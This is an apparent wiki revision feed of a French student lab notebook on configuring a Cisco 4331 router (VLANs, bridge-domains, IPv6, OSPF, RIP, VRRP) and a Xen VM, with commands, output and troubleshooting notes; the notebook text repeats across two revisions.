==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRp - Cassage de clé WEP - Cassage de clé WPA&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (21/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après quelques recherches, une première solution a été de préciser sur l'interface des bridge-domain que les paquets étaient encapsulés en DOT1Q. Solution '''peu logique''' vu que l'encapsulation est déjà faite dans les service instance.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après encore quelques recherches, une solution plausible est que '''le routeur ne sait pas qu'il faut dé-encapsuler les paquets venant d'un VLAN'''. Théoriquement, il n'enlèverait pas le tag associé à l'encapsulation DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une commande cisco à associer à TOUTES les interfaces service instance permet de préciser qu'il faut supprimer le tag associé à l'encapsulation:&lt;br /&gt;
&amp;lt;pre&amp;gt;rewrite ingress tag pop 1 symmetric&amp;lt;/pre&amp;gt;&lt;br /&gt;
Une fois cette commande appliquée à tous les services, nous pouvons effectuer un test préalable : '''Nous connectons un eeePC au commutateur via un port associé au VLAN des VM. L'eeePC serait muni d'une IP dans le réseau des VM.'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Résultat '''OK'''&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc tenter de ping le routeur depuis la machine virtuelle :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ping 193.48.57.171&lt;br /&gt;
PING 193.48.57.171 (193.48.57.171) 56(84) bytes of data.&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=1 ttl=255 time=0.360 ms&lt;br /&gt;
64 bytes from 193.48.57.171: icmp_seq=2 ttl=255 time=0.271 ms&lt;br /&gt;
^C&lt;br /&gt;
--- 193.48.57.171 ping statistics ---&lt;br /&gt;
2 packets transmitted, 2 received, 0% packet loss, time 999ms&lt;br /&gt;
rtt min/avg/max/mdev = 0.271/0.315/0.360/0.047 ms&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre configuration locale est donc maintenant achevée. Nous pouvons passer à la configuration de l'interconnexion ipv4 et ipv6 de l'école.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 4e semaine====&lt;br /&gt;
=====Configuration IPv6=====&lt;br /&gt;
Nous avons donc pu commencer la configuration IPv6 de notre routeur.&amp;lt;br /&amp;gt;&lt;br /&gt;
Chaque bridge-domain aura son adresse IP dans le réseau IPv6 de l'école, avec un préfixe débutant à 2001:660:4401:60b0::/64.&amp;lt;br /&amp;gt;&lt;br /&gt;
La configuration est la suivante, pour chaque BDI:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco(config)#int BDI6                                                          &lt;br /&gt;
cisco(config-if)#ipv6 address 2001:660:4401:60b4::/64 eui-64                    &lt;br /&gt;
cisco(config-if)#ipv6 nd prefix 2001:660:4401:60b4::/64 1000 900                &lt;br /&gt;
cisco(config-if)#ipv6 nd router-preference high                                 &lt;br /&gt;
cisco(config-if)#ipv6 enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration OSPF (IPv4)=====&lt;br /&gt;
Dès notre arrivée, Mr.REDON nous a dit que, pour booster le TP, il avait effectué lui-même la configuration OSPF de notre routeur. La voici:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;router ospf 1&lt;br /&gt;
 router-id 10.60.2.1&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0&lt;br /&gt;
 summary-address 193.48.57.160 255.255.255.240&lt;br /&gt;
 redistribute connected metric 30 subnets&lt;br /&gt;
 network 192.168.222.0 0.0.0.7 area 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration RIP (IPv6)=====&lt;br /&gt;
Le protocole RIPv6 est une stratégie de routage pour IPv6. Ce protocole est configuré pour le BDI130 (correspondant au VLAN130 d'interconnexion des routeurs de l'école). La configuration de RIP est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;ipv6 router rip tpima5sc&lt;br /&gt;
 redistribute connected metric 1&lt;br /&gt;
 redistribute static metric 1&lt;br /&gt;
 redistribute rip 1 metric 1&amp;lt;/pre&amp;gt;&lt;br /&gt;
La prise en compte du protocole RIP dans la BDI130 est la suivante:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI130&lt;br /&gt;
 ip address 192.168.222.1 255.255.255.248&lt;br /&gt;
 ipv6 address 2001:660:4401:60AA::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60AA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 ipv6 rip tpima5sc enable&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pour confirmer notre résultat, nous regardons la table de routage IPv6:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; cisco#sh ipv6 route&lt;br /&gt;
IPv6 Routing Table - default - 65 entries&lt;br /&gt;
Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
       B - BGP, R - RIP, I1 - ISIS L1, I2 - ISIS L2&lt;br /&gt;
       IA - ISIS interarea, IS - ISIS summary, D - EIGRP, EX - EIGRP external&lt;br /&gt;
       ND - ND Default, NDp - ND Prefix, DCE - Destination, NDr - Redirect&lt;br /&gt;
       O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
       ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2, a - Application&lt;br /&gt;
R   ::/0 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&lt;br /&gt;
R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
     via FE80::211:5DFF:FEF2:5400, BDI130&amp;lt;/pre&amp;gt;&lt;br /&gt;
Notre routeur détecte les routeurs de l'école, notre configuration est donc achevée.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration VRRP=====&lt;br /&gt;
Le VRRP est un protocole de redondance. Une adresse IP virtuelle (IP flottante) est montée sur 1 des 2 routeurs. Si le routeur sur laquelle est montée l'IP flottante tombe, l'IP est montée sur l'autre routeur. De plus, les machines pourront envoyer les paquets vers l'adresse IP virtuelle, et le VRRP dispatchera les paquets entre les 2 routeurs.&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration VRRP de notre routeur:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;interface BDI2&lt;br /&gt;
 ip address 10.60.2.1 255.255.255.0&lt;br /&gt;
 ipv6 address 2001:660:4401:60B0::/64 eui-64&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60B0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 vrrp 1 ip 10.60.2.3&lt;br /&gt;
 vrrp 1 priority 110&amp;lt;/pre&amp;gt;&lt;br /&gt;
10.60.X.1 est l'espace des adresses IP de notre routeur (4331), 10.60.X.2 est l'espace des adresses IP du routeur 3560E, donc 10.60.X.3 est l'espace des adresses IP flottantes, X représente le numéro du BDI.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons voir si notre configuration VRRP est effective : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cisco#sh vrrp&lt;br /&gt;
BDI12 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 193.48.57.173&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 193.48.57.171 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&lt;br /&gt;
BDI2 - Group 1  &lt;br /&gt;
  State is Master&lt;br /&gt;
  Virtual IP address is 10.60.2.3&lt;br /&gt;
  Virtual MAC address is 0000.5e00.0101&lt;br /&gt;
  Advertisement interval is 1.000 sec&lt;br /&gt;
  Preemption enabled&lt;br /&gt;
  Priority is 110 &lt;br /&gt;
  Master Router is 10.60.2.1 (local), priority is 110 &lt;br /&gt;
  Master Advertisement interval is 1.000 sec&lt;br /&gt;
  Master Down interval is 3.570 sec&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cependant, même si notre configuration VRRP est bonne, nous n'arrivons pas à ping 193.48.57.173, qui représente l'adresse IP virtuelle montée sur le bridge-domain des VM.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34944</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=34944"/>
				<updated>2016-11-07T08:36:27Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (21/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
